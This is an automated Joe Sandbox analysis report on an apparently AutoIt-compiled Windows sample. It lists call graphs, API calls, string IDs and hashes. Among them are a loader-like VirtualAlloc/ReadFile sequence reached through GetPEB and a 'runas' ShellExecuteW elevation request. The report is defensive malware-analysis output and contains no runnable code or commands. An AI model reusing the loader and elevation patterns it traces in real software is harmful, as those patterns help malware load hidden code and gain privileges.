Sleep 98631->98636 98638 561dda timeGetTime 98631->98638 98653 51ec40 256 API calls 98631->98653 98654 51bf40 256 API calls 98631->98654 98655 521310 256 API calls 98631->98655 98657 51dfd0 98631->98657 98680 52edf6 98631->98680 98685 51dd50 256 API calls 98631->98685 98687 583a2a 23 API calls 98631->98687 98688 58359c 82 API calls __wsopen_s 98631->98688 98632->98633 98633->98631 98634->98631 98637 51dbc0 98635->98637 98636->98637 98637->98626 98637->98631 98639 52e551 timeGetTime 98637->98639 98642 562c0b GetExitCodeProcess 98637->98642 98643 5a29bf GetForegroundWindow 98637->98643 98647 562a31 98637->98647 98648 562ca9 Sleep 98637->98648 98689 595658 23 API calls 98637->98689 98690 57e97b QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 98637->98690 98691 57d4dc 47 API calls 98637->98691 98686 52e300 23 API calls 98638->98686 98639->98637 98645 562c37 CloseHandle 98642->98645 98646 562c21 WaitForSingleObject 98642->98646 98643->98637 98645->98637 98646->98631 98646->98645 98647->98626 98648->98631 98653->98631 98654->98631 98655->98631 98658 51e010 98657->98658 98675 51e0dc ISource 98658->98675 98694 530242 5 API calls __Init_thread_wait 98658->98694 98659 51ec40 256 API calls 98659->98675 98662 562fca 98664 51a961 22 API calls 98662->98664 98662->98675 98663 51a961 22 API calls 98663->98675 98666 562fe4 98664->98666 98665 58359c 82 API calls 98665->98675 98695 5300a3 29 API calls __onexit 98666->98695 98670 562fee 98696 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98670->98696 98674 51a8c7 22 API calls 98674->98675 98675->98659 98675->98663 98675->98665 98675->98674 98676 51e3e1 98675->98676 98677 5204f0 22 API calls 98675->98677 98692 51a81b 41 API calls 98675->98692 98693 52a308 256 API calls 98675->98693 98697 530242 5 API calls __Init_thread_wait 98675->98697 98698 5300a3 29 API calls __onexit 98675->98698 98699 5301f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 98675->98699 98700 5947d4 256 API calls 98675->98700 98701 5968c1 256 API calls 98675->98701 98676->98631 98677->98675 98681 52ee12 98680->98681 98683 52ee09 98680->98683 98682 52ee36 IsDialogMessageW 98681->98682 98681->98683 98684 56efaf GetClassLongW 98681->98684 98682->98681 98682->98683 98683->98631 98684->98681 98684->98682 98685->98631 98686->98631 98687->98631 98688->98631 98689->98637 98690->98637 98691->98637 98692->98675 98693->98675 98694->98662 98695->98670 98696->98675 98697->98675 98698->98675 98699->98675 98700->98675 98701->98675 98702 16033db 98705 1603050 98702->98705 98704 1603427 98706 1600a80 GetPEB 98705->98706 98709 16030ef 98706->98709 98708 1603120 CreateFileW 98708->98709 98712 160312d 98708->98712 98710 1603149 VirtualAlloc 98709->98710 98709->98712 98716 1603250 CloseHandle 98709->98716 98717 1603260 VirtualFree 98709->98717 98718 1603f60 GetPEB 98709->98718 98711 160316a ReadFile 98710->98711 98710->98712 98711->98712 98713 1603188 VirtualAlloc 98711->98713 98714 160334a 98712->98714 98715 160333c VirtualFree 98712->98715 98713->98709 98713->98712 98714->98704 98715->98714 98716->98709 98717->98709 98719 1603f8a 98718->98719 98719->98708 98720 511cad SystemParametersInfoW

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 234 5142de-51434d call 51a961 GetVersionExW call 516b57 239 553617-55362a 234->239 240 514353 234->240 241 55362b-55362f 239->241 242 514355-514357 240->242 243 553631 241->243 244 553632-55363e 241->244 245 553656 242->245 246 51435d-5143bc call 5193b2 call 5137a0 242->246 243->244 244->241 247 553640-553642 244->247 250 55365d-553660 245->250 262 5143c2-5143c4 246->262 263 5537df-5537e6 246->263 247->242 249 553648-55364f 247->249 249->239 253 553651 249->253 254 553666-5536a8 250->254 255 51441b-514435 GetCurrentProcess IsWow64Process 250->255 253->245 254->255 259 5536ae-5536b1 254->259 257 514494-51449a 255->257 258 514437 255->258 264 51443d-514449 257->264 258->264 260 5536b3-5536bd 259->260 261 5536db-5536e5 259->261 265 5536bf-5536c5 260->265 266 5536ca-5536d6 260->266 268 5536e7-5536f3 261->268 269 5536f8-553702 261->269 262->250 267 5143ca-5143dd 262->267 270 553806-553809 263->270 271 5537e8 263->271 272 553824-553828 GetSystemInfo 264->272 273 51444f-51445e LoadLibraryA 264->273 265->255 266->255 274 5143e3-5143e5 267->274 275 553726-55372f 267->275 268->255 277 553715-553721 269->277 278 553704-553710 269->278 279 5537f4-5537fc 270->279 280 55380b-55381a 270->280 276 5537ee 271->276 281 514460-51446e GetProcAddress 273->281 282 51449c-5144a6 GetSystemInfo 273->282 284 55374d-553762 274->284 285 5143eb-5143ee 274->285 286 553731-553737 275->286 287 55373c-553748 275->287 276->279 277->255 278->255 279->270 280->276 288 55381c-553822 280->288 281->282 289 514470-514474 GetNativeSystemInfo 281->289 283 514476-514478 282->283 294 514481-514493 283->294 295 51447a-51447b FreeLibrary 283->295 292 553764-55376a 284->292 293 55376f-55377b 284->293 290 553791-553794 285->290 291 5143f4-51440f 285->291 286->255 287->255 288->279 289->283 290->255 296 55379a-5537c1 290->296 297 514415 291->297 298 553780-55378c 291->298 292->255 293->255 295->294 299 5537c3-5537c9 296->299 300 5537ce-5537da 296->300 297->255 298->255 299->255 300->255
                                                APIs
                                                • GetVersionExW.KERNEL32(?), ref: 0051430D
                                                  • Part of subcall function 00516B57: _wcslen.LIBCMT ref: 00516B6A
                                                • GetCurrentProcess.KERNEL32(?,005ACB64,00000000,?,?), ref: 00514422
                                                • IsWow64Process.KERNEL32(00000000,?,?), ref: 00514429
                                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00514454
                                                • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00514466
                                                • GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 00514474
                                                • FreeLibrary.KERNEL32(00000000,?,?), ref: 0051447B
                                                • GetSystemInfo.KERNEL32(?,?,?), ref: 005144A0
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                • API String ID: 3290436268-3101561225
                                                • Opcode ID: 9c8305d5dcf685a4b0f12ecb36f2286912806a6685b9f5acf30200da6524060d
                                                • Instruction ID: ac8a0bbb934b3f79df29d2195ded40d43c13280d5240523b76426081269d0183
                                                • Opcode Fuzzy Hash: 9c8305d5dcf685a4b0f12ecb36f2286912806a6685b9f5acf30200da6524060d
                                                • Instruction Fuzzy Hash: 7FA1E47190AAC0CFDB19C7697CC01D97FA57B3E780B285C99D4C59BA22D2704A4CEB39

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 1171 5142a2-5142ba CreateStreamOnHGlobal 1172 5142da-5142dd 1171->1172 1173 5142bc-5142d3 FindResourceExW 1171->1173 1174 5142d9 1173->1174 1175 5535ba-5535c9 LoadResource 1173->1175 1174->1172 1175->1174 1176 5535cf-5535dd SizeofResource 1175->1176 1176->1174 1177 5535e3-5535ee LockResource 1176->1177 1177->1174 1178 5535f4-553612 1177->1178 1178->1174
                                                APIs
                                                • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,005150AA,?,?,00000000,00000000), ref: 005142B2
                                                • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,005150AA,?,?,00000000,00000000), ref: 005142C9
                                                • LoadResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535BE
                                                • SizeofResource.KERNEL32(?,00000000,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20), ref: 005535D3
                                                • LockResource.KERNEL32(005150AA,?,?,005150AA,?,?,00000000,00000000,?,?,?,?,?,?,00514F20,?), ref: 005535E6
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                • String ID: SCRIPT
                                                • API String ID: 3051347437-3967369404
                                                • Opcode ID: 48154616b0d3bdbeceac9f668d8d361e85e1801ac70b02415dabd46cd6e3cbc2
                                                • Instruction ID: e5e0dc8853f89fc7c25ddc1ad19a9260f9aa9c733a047f7e9c79c4dffda4c798
                                                • Opcode Fuzzy Hash: 48154616b0d3bdbeceac9f668d8d361e85e1801ac70b02415dabd46cd6e3cbc2
                                                • Instruction Fuzzy Hash: B6117C78200701BFE7218B65DC48F677FBAFFD6B51F108169B41296250DB71D8449A20

                                                Control-flow Graph

                                                APIs
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 00512B6B
                                                  • Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78
                                                  • Part of subcall function 00519CB3: _wcslen.LIBCMT ref: 00519CBD
                                                • GetForegroundWindow.USER32(runas,?,?,?,?,?,005D2224), ref: 00552C10
                                                • ShellExecuteW.SHELL32(00000000,?,?,005D2224), ref: 00552C17
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
                                                • String ID: runas
                                                • API String ID: 448630720-4000483414
                                                • Opcode ID: ad5ed4fc5e2c1d674b9ecde2a990335b996731b5878198f2e8ad687d85abe990
                                                • Instruction ID: f702cb7e64c365209b1356b3a388479cdc678667a0ed7ac8af206a66260bd42c
                                                • Opcode Fuzzy Hash: ad5ed4fc5e2c1d674b9ecde2a990335b996731b5878198f2e8ad687d85abe990
                                                • Instruction Fuzzy Hash: C411E7311083426AEB14FF20D8699FD7FA4BFE1351F04082EF182421A2CF318AC9D712
                                                APIs
                                                • lstrlenW.KERNEL32(?,00555222), ref: 0057DBCE
                                                • GetFileAttributesW.KERNELBASE(?), ref: 0057DBDD
                                                • FindFirstFileW.KERNELBASE(?,?), ref: 0057DBEE
                                                • FindClose.KERNEL32(00000000), ref: 0057DBFA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: FileFind$AttributesCloseFirstlstrlen
                                                • String ID:
                                                • API String ID: 2695905019-0
                                                • Opcode ID: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
                                                • Instruction ID: f0e16c42470e8858e4035df2d2e7cfdca5165d8050b9322c8c5084dd2548bc3d
                                                • Opcode Fuzzy Hash: d667dd7003aae2d823655a1aedfb75caaccad058711674bbbda24ed44d2af4e7
                                                • Instruction Fuzzy Hash: 36F0A0308109105783216B78AC0D8AA3FBCAF42334B108702F87AC20E0EBB05D58EAA5
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: BuffCharUpper
                                                • String ID: p#^
                                                • API String ID: 3964851224-2580200144
                                                • Opcode ID: d26ac5ccd41c4c41bcd5cf8e90c9f8f19bf679bcbdc6b5bcd267b5df6a4300ba
                                                • Instruction ID: 180d47d191b079c4de38bfffd8ad49dc2cea871e64a4e535c356fef6e14eddb3
                                                • Opcode Fuzzy Hash: d26ac5ccd41c4c41bcd5cf8e90c9f8f19bf679bcbdc6b5bcd267b5df6a4300ba
                                                • Instruction Fuzzy Hash: 0DA26B706083419FD714DF18C484B6ABFE1BF89304F14896DE89A9B392D772EC85CB92
                                                APIs
                                                • GetInputState.USER32 ref: 0051D807
                                                • timeGetTime.WINMM ref: 0051DA07
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB28
                                                • TranslateMessage.USER32(?), ref: 0051DB7B
                                                • DispatchMessageW.USER32(?), ref: 0051DB89
                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0051DB9F
                                                • Sleep.KERNEL32(0000000A), ref: 0051DBB1
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                • String ID:
                                                • API String ID: 2189390790-0
                                                • Opcode ID: 63f01a4a6094de267a4c1e910c2e38b244e20f792263150d8b94e3c66e3eb64b
                                                • Instruction ID: fd57dc7d5e94747b1b16466e0e835fa13b7976316c91f25d005dd059956decd9
                                                • Opcode Fuzzy Hash: 63f01a4a6094de267a4c1e910c2e38b244e20f792263150d8b94e3c66e3eb64b
                                                • Instruction Fuzzy Hash: EE42C5706087429FE728CF24C888BAABFF4BF95304F14495DE4958B291D774E884DFA2

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00512D07
                                                • RegisterClassExW.USER32(00000030), ref: 00512D31
                                                • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
                                                • InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00512D6F
                                                • LoadIconW.USER32(000000A9), ref: 00512D85
                                                • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00512D94
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                • API String ID: 2914291525-1005189915
                                                • Opcode ID: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
                                                • Instruction ID: f143d0c6b0c80f3b561a8e98a00846a8f3dcc9a9066f4841c4aa78f998568ed5
                                                • Opcode Fuzzy Hash: 05a03a51e42841c1cd0665a3e8ae9cb0c71c7fa4468e5983488920ca7cf30ad6
                                                • Instruction Fuzzy Hash: F021E3B5901258AFDB00DFA4E889BDDBFB4FB19700F00811AF551EA2A0D7B50548EFA4

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 302 548d45-548d55 303 548d57-548d6a call 53f2c6 call 53f2d9 302->303 304 548d6f-548d71 302->304 322 5490f1 303->322 305 548d77-548d7d 304->305 306 5490d9-5490e6 call 53f2c6 call 53f2d9 304->306 305->306 308 548d83-548dae 305->308 323 5490ec call 5427ec 306->323 308->306 311 548db4-548dbd 308->311 314 548dd7-548dd9 311->314 315 548dbf-548dd2 call 53f2c6 call 53f2d9 311->315 320 5490d5-5490d7 314->320 321 548ddf-548de3 314->321 315->323 324 5490f4-5490f9 320->324 321->320 326 548de9-548ded 321->326 322->324 323->322 326->315 329 548def-548e06 326->329 331 548e23-548e2c 329->331 332 548e08-548e0b 329->332 333 548e2e-548e45 call 53f2c6 call 53f2d9 call 5427ec 331->333 334 548e4a-548e54 331->334 335 548e15-548e1e 332->335 336 548e0d-548e13 332->336 365 54900c 333->365 338 548e56-548e58 334->338 339 548e5b-548e79 call 543820 call 5429c8 * 2 334->339 340 548ebf-548ed9 335->340 336->333 336->335 338->339 369 548e96-548ebc call 549424 339->369 370 548e7b-548e91 call 53f2d9 call 53f2c6 339->370 342 548fad-548fb6 call 54f89b 340->342 343 548edf-548eef 340->343 354 548fb8-548fca 342->354 355 549029 342->355 343->342 347 548ef5-548ef7 343->347 347->342 351 548efd-548f23 347->351 351->342 356 548f29-548f3c 351->356 354->355 360 548fcc-548fdb GetConsoleMode 354->360 358 54902d-549045 ReadFile 355->358 356->342 361 548f3e-548f40 356->361 363 549047-54904d 358->363 364 5490a1-5490ac GetLastError 358->364 360->355 366 548fdd-548fe1 360->366 361->342 367 548f42-548f6d 361->367 363->364 373 54904f 363->373 371 5490c5-5490c8 364->371 372 5490ae-5490c0 call 53f2d9 call 53f2c6 364->372 375 54900f-549019 call 5429c8 365->375 366->358 374 548fe3-548ffd ReadConsoleW 366->374 367->342 376 548f6f-548f82 367->376 369->340 370->365 384 549005-54900b call 53f2a3 371->384 385 5490ce-5490d0 371->385 372->365 381 549052-549064 373->381 382 54901e-549027 374->382 383 548fff GetLastError 374->383 375->324 376->342 377 548f84-548f86 376->377 377->342 388 548f88-548fa8 377->388 381->375 392 549066-54906a 381->392 382->381 383->384 384->365 385->375 388->342 396 549083-54908e 392->396 397 54906c-54907c call 548a61 392->397 402 549090 call 548bb1 396->402 403 54909a-54909f call 5488a1 396->403 408 54907f-549081 397->408 409 549095-549098 402->409 403->409 408->375 409->408
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: .S
                                                • API String ID: 0-1539595904
                                                • Opcode ID: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
                                                • Instruction ID: 4df9f2ad0d55cb23b9e7b728096982678500be7613d02536fa81326fd622d9b8
                                                • Opcode Fuzzy Hash: f4084f31dbfe58e50bcc5b216dca1cda73154b838ff3e5d66c7742d360502bd2
                                                • Instruction Fuzzy Hash: ABC1E174D04249AFDB15DFA8D84ABEEBFB0BF59318F044099F418AB392C7709941CB61

                                                Control-flow Graph

                                                • Executed
                                                • Not Executed
                                                control_flow_graph 410 55065b-55068b call 55042f 413 5506a6-5506b2 call 545221 410->413 414 55068d-550698 call 53f2c6 410->414 420 5506b4-5506c9 call 53f2c6 call 53f2d9 413->420 421 5506cb-550714 call 55039a 413->421 419 55069a-5506a1 call 53f2d9 414->419 430 55097d-550983 419->430 420->419 428 550716-55071f 421->428 429 550781-55078a GetFileType 421->429 432 550756-55077c GetLastError call 53f2a3 428->432 433 550721-550725 428->433 434 5507d3-5507d6 429->434 435 55078c-5507bd GetLastError call 53f2a3 CloseHandle 429->435 432->419 433->432 439 550727-550754 call 55039a 433->439 437 5507df-5507e5 434->437 438 5507d8-5507dd 434->438 435->419 449 5507c3-5507ce call 53f2d9 435->449 442 5507e9-550837 call 54516a 437->442 443 5507e7 437->443 438->442 439->429 439->432 453 550847-55086b call 55014d 442->453 454 550839-550845 call 5505ab 442->454 443->442 449->419 460 55086d 453->460 461 55087e-5508c1 453->461 454->453 459 55086f-550879 call 5486ae 454->459 459->430 460->459 463 5508c3-5508c7 461->463 464 5508e2-5508f0 461->464 463->464 466 5508c9-5508dd 463->466 467 5508f6-5508fa 464->467 468 55097b 464->468 466->464 467->468 469 5508fc-55092f CloseHandle call 55039a 467->469 468->430 472 550931-55095d GetLastError call 53f2a3 call 545333 469->472 473 550963-550977 469->473 472->473 473->468
                                                APIs
                                                  • Part of subcall function 0055039A: CreateFileW.KERNELBASE(00000000,00000000,?,00550704,?,?,00000000,?,00550704,00000000,0000000C), ref: 005503B7
                                                • GetLastError.KERNEL32 ref: 0055076F
                                                • __dosmaperr.LIBCMT ref: 00550776
                                                • GetFileType.KERNELBASE(00000000), ref: 00550782
                                                • GetLastError.KERNEL32 ref: 0055078C
                                                • __dosmaperr.LIBCMT ref: 00550795
                                                • CloseHandle.KERNEL32(00000000), ref: 005507B5
                                                • CloseHandle.KERNEL32(?), ref: 005508FF
                                                • GetLastError.KERNEL32 ref: 00550931
                                                • __dosmaperr.LIBCMT ref: 00550938
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                • String ID: H
                                                • API String ID: 4237864984-2852464175
                                                • Opcode ID: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
                                                • Instruction ID: 86c9dab704b1307408f9815d7b70e31a8ce6c6967f8c5cd898817c4fe478aa28
                                                • Opcode Fuzzy Hash: d391549f42ad372cd4da605374c614e6c34598012bd20f1ceba67b5255ef5fab
                                                • Instruction Fuzzy Hash: 7DA14636A101058FDF19AF68DCA5BAE3FA0FB46321F14115AFC119F2D1DB31981ADB91

                                                Control-flow Graph

                                                APIs
                                                  • Part of subcall function 00513A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,005E1418,?,00512E7F,?,?,?,00000000), ref: 00513A78
                                                  • Part of subcall function 00513357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00513379
                                                • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 0051356A
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 0055318D
                                                • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 005531CE
                                                • RegCloseKey.ADVAPI32(?), ref: 00553210
                                                • _wcslen.LIBCMT ref: 00553277
                                                • _wcslen.LIBCMT ref: 00553286
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2087235200.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                • Associated: 00000000.00000002.2087214343.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087279100.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087321458.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2087338217.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_510000_4sfN3Gx1vO.jbxd
                                                Similarity
                                                • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                • API String ID: 98802146-2727554177
                                                • Opcode ID: 8b1603e3cdd3a94386e423249b5f248d7ed76782cc7443d9aeeefbf5c27e7617
                                                • Instruction ID: 92f4a2eb1b32ecace75e30f4bbb629a098089ed271d80905e5beff44e7be68d5
                                                • Opcode Fuzzy Hash: 8b1603e3cdd3a94386e423249b5f248d7ed76782cc7443d9aeeefbf5c27e7617
                                                • Instruction Fuzzy Hash: 23716D714043419ED318DF65DC969ABBFE8BF99740F40082EF585871A4EB709A88DF61

                                                Control-flow Graph

                                                APIs
                                                • GetSysColorBrush.USER32(0000000F), ref: 00512B8E
                                                • LoadCursorW.USER32(00000000,00007F00), ref: 00512B9D
                                                • LoadIconW.USER32(00000063), ref: 00512BB3
                                                • LoadIconW.USER32(000000A4), ref: 00512BC5
                                                • LoadIconW.USER32(000000A2), ref: 00512BD7
                                                • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00512BEF
                                                • RegisterClassExW.USER32(?), ref: 00512C40
                                                  • Part of subcall function 00512CD4: GetSysColorBrush.USER32(0000000F), ref: 00512D07
                                                  • Part of subcall function 00512CD4: RegisterClassExW.USER32(00000030), ref: 00512D31
                                                  • Part of subcall function 00512CD4: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00512D42
                                                  • Part of subcall function 00512CD4: InitCommonControlsEx.COMCTL32(?), ref: 00512D5F
